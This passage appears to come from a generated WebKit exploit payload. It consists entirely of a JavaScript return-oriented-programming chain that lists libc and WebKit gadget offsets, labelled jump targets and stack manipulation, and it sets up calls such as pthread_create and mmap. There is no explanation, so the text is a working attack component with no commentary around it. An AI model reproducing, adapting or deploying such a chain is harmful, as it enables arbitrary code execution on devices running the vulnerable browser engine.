//L2317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+157664, //L2318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2317: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2318: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2319: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+157760, //L2320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2320: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2322: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+157880, //L2325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157864, //L2323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2323: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2325: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+158024, //L2328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157992, //L2326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+158008, //L2327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2326: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2327: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2328: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2330: ropchain+158128, //L2329 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+159008, //L2331 //L2329: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+158272, //L2333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158288, //L2334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+158256, //L2332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2332: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2333: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2334: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+158400, //L2335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158432, //L2337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+158416, //L2336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2335: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2337: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+158536, //L2338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158552, //L2339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2338: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2339: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+158672, //L2340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158656, //L2341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2341: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2340: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+158760, //L2343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+158744, //L2342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2342: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2343: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+158864, //L2344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158880, //L2345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2344: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2345: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+159000, //L2346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158984, //L2347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2347: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2346: db([0, 0]); // 0x0 //L2331: set_gadget(libc_base+764760,); //pop rsi db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+1438842, //pop rdx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+3236123, //pop r9 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+756281, //xor rax, rax libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+782311, //pop rsp libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967080, 4294967295]); // -0xd8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([200, 0]); // 0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967088, 4294967295]); // -0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([192, 0]); // 0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967096, 4294967295]); // -0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([184, 0]); // 0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967104, 4294967295]); // -0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([176, 0]); // 0xb0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967112, 4294967295]); // -0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([168, 0]); // 0xa8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ webkit_base+14664103, //and rax, rcx libc_base+763368, //pop rcx pthread_create_addr, webkit_base+20307877, //mov [rax], rcx libc_base+764760 //pop rsi ]); db([4294967192, 4294967295]); // -0x68 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([32, 0]); // 0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([128, 0]); // 0x80 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+160328, //L2348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+782311 //pop rsp ]); //L2348: db([0, 0]); // 0x0 //L2121: set_gadget(libc_base+764760,); //pop rsi db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+1438842, //pop rdx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+3236123, //pop r9 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+756281, //xor rax, rax libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+782311, //pop rsp libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967080, 4294967295]); // -0xd8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([200, 0]); // 0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967088, 4294967295]); // -0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([192, 0]); // 0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967096, 4294967295]); // -0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([184, 0]); // 0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967104, 4294967295]); // -0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([176, 0]); // 0xb0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967112, 4294967295]); // -0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([168, 0]); // 0xa8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ webkit_base+14664103, //and rax, rcx libc_base+763368, //pop rcx mmap_addr, webkit_base+20307877, //mov [rax], rcx libc_base+764760 //pop rsi ]); db([4294967192, 4294967295]); // -0x68 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([32, 0]); // 0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([128, 0]); // 0x80 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+161656, //L2349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+782311 //pop rsp ]); //L2349: db([0, 0]); // 0x0 //__out_buffer: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+161728, //L2351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2351: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+161824, //L2352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+161856, //L2355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2352: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2354: db([32, 0]); // 0x20 set_gadget(webkit_base+568675,); //pop r8 //L2355: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+161960, //L2358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+161944, //L2356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2356: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2358: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+162104, //L2361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+162072, //L2359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+162088, //L2360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2359: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2360: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2361: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+162184, //L2362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2364: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+162304, //L2367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+162288, //L2365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2365: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2367: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+162416, //L2368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+162448, //L2370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+162432, //L2369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2368: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2369: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2370: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+162624, //L2372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+162640, //L2373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+162608, //L2371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2371: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2372: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2373: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+162752, //L2375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+162800, //L2378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+162768, //L2376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2375: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2376: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2377: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2378: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+162912, //L2379+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+162904, //L2379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2379: db([0, 0]); // 0x0 set_gadgets([ ropchain+162928, //L2379+24 ropchain+165496, //L2374 libc_base+764760, //pop rsi ropchain+162968, //L2380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2380: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2382: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+163088, //L2385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+163072, //L2383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2383: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2385: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+163248, //L2389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+163216, //L2387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+163232, //L2388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2386: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2387: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2388: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2389: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+163304, //L2391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2391: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+163432, //L2393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+163448, //L2394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+163416, //L2392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2392: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2393: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2394: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+163608, //L2398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+163576, //L2396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+163592, //L2397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2395: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2396: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi 